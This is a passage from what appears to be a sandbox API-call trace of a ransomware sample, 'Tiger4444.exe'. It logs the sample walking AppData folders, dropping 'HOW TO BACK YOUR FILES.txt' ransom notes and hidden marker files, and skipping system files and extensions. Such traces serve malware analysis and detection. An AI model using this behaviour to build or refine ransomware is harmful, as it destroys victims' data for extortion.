YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.630] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.630] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.630] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.631] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.631] CloseHandle (hObject=0x2c8) returned 1 [0052.631] CloseHandle (hObject=0x2ac) returned 1 [0052.631] GetCurrentThreadId () returned 0xfa8 [0052.631] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc916b0 [0052.631] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" [0052.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85ef0 | out: hHeap=0xc50000) returned 1 [0052.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc916a8 | out: hHeap=0xc50000) returned 1 [0052.631] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" [0052.631] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\" [0052.631] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3" [0052.631] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\_hiddencm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.632] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.652] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.653] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.653] CloseHandle (hObject=0x2ac) returned 1 [0052.654] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned 71 [0052.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.654] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x8464e3d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.654] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.654] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.654] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.654] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.654] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x8464e3d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.654] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.654] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.654] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.654] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.654] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.654] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8464e3d2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8464e3d2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8467c814, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.654] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.654] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.654] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8464e3d2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8464e3d2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8467c814, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.654] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.654] lstrcpyW (in: lpString1=0x30aeb38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\_hiddencm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.655] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.655] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc30000 [0052.656] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.656] CloseHandle (hObject=0x2c8) returned 1 [0052.656] CloseHandle (hObject=0x2ac) returned 1 [0052.656] GetCurrentThreadId () returned 0xfa8 [0052.656] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc916d0 [0052.656] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0052.656] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78aa8 | out: hHeap=0xc50000) returned 1 [0052.656] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc916c8 | out: hHeap=0xc50000) returned 1 [0052.656] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0052.656] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0052.656] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3" [0052.656] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.657] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.660] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.661] CloseHandle (hObject=0x2ac) returned 1 [0052.662] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 65 [0052.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.662] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38f794c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8467c814, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f48 [0052.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.662] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.662] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.662] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.662] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38f794c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8467c814, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.662] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.662] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.662] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.662] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.662] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.662] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8467c814, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8467c814, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8467c814, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.662] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.662] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.662] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Tiger4444.exe") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="windows") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="bootmgr") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="pagefile.sys") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="boot") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="ids.txt") returned -1 [0052.662] lstrcmpiW (lpString1="_hiddenPbk", lpString2="NTUSER.DAT") returned -1 [0052.662] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="_hiddenPbk" | out: lpString1="_hiddenPbk") returned="_hiddenPbk" [0052.662] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91628 [0052.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x9a) returned 0xc73f50 [0052.663] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91630 | out: ListHead=0xc66828, ListEntry=0xc91630) returned 0xc66368 [0052.663] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0052.663] FindClose (in: hFindFile=0xc72f48 | out: hFindFile=0xc72f48) returned 1 [0052.663] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.663] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.663] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.663] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc30000 [0052.663] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.663] CloseHandle (hObject=0x2c8) returned 1 [0052.663] CloseHandle (hObject=0x2ac) returned 1 [0052.664] GetCurrentThreadId () returned 0xfa8 [0052.664] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91630 [0052.664] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0052.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0052.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91628 | out: hHeap=0xc50000) returned 1 [0052.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0052.664] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0052.664] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3" [0052.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.664] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.667] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.668] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.668] CloseHandle (hObject=0x2ac) returned 1 [0052.668] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 76 [0052.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.668] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x8469aa6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.669] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.669] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.669] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.669] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.669] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x8469aa6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.669] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.669] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.669] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.669] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.669] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.669] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8469aa6b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8469aa6b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8469aa6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.669] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.669] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.669] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Tiger4444.exe") returned -1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2=".") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="..") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="windows") returned -1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="bootmgr") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="pagefile.sys") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="boot") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ids.txt") returned 1 [0052.669] lstrcmpiW (lpString1="rasphone.pbk", lpString2="NTUSER.DAT") returned 1 [0052.669] lstrcpyW (in: lpString1=0x30aeb42, lpString2="rasphone.pbk" | out: lpString1="rasphone.pbk") returned="rasphone.pbk" [0052.669] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk", dwFileAttributes=0x0) returned 1 [0052.669] lstrlenW (lpString="rasphone.pbk") returned 12 [0052.669] lstrlenW (lpString="Tiger4444") returned 9 [0052.669] lstrcmpiW (lpString1="phone.pbk", lpString2="Tiger4444") returned -1 [0052.670] lstrlenW (lpString=".dll") returned 4 [0052.670] lstrcmpiW (lpString1=".pbk", lpString2=".dll") returned 1 [0052.670] lstrlenW (lpString=".lnk") returned 4 [0052.670] lstrcmpiW (lpString1=".pbk", lpString2=".lnk") returned 1 [0052.670] lstrlenW (lpString=".ini") returned 4 [0052.670] lstrcmpiW (lpString1=".pbk", lpString2=".ini") returned 1 [0052.670] lstrlenW (lpString=".sys") returned 4 [0052.670] lstrcmpiW (lpString1=".pbk", lpString2=".sys") returned 